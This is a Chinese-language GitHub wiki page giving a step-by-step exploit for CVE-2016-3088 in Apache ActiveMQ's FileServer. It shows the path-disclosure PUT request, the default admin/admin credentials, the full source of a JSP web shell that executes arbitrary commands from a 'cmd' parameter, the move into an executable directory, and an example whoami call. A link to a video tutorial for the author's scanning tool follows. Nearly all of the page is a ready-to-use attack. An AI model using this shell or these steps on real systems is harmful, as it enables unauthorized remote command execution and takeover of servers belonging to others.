Skip to content

漏洞利用 CVE 2016 3088 ActiveMQ GetShell Exploit

k8gege edited this page Oct 18, 2019 · 6 revisions

CVE-2016-3088 ActiveMQ GetShell Exploit

0x000 漏洞信息

漏洞编号: CVE-2016-3088
漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录
影响版本: Apache ActiveMQ 5.0.0 – 5.13.2

0x001 获取路径

PUT /fileserver/%20/%20

0x002 上传shell

上传文件和移动文件均需登陆,默认帐密admin/admin

<%@ page import="java.io.*"%>
<%
out.print("Hello");
String strcmd = request.getParameter("cmd");
String line =null;
Process p=Runtime.getRuntime().exec(strcmd);
InputStream is = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while((line =br.readLine())!=null){
out.print(line+"
");
}
%>

0x003 移动shell

根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析

0x004 Cscan调用

0x005 连接shell

访问http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami

0x006 视频教程

https://github.com/k8gege/K8CScan/blob/master/Video/K8Cscan Apache ActiveMQ GetShell CVE-2016-3088.rar

Clone this wiki locally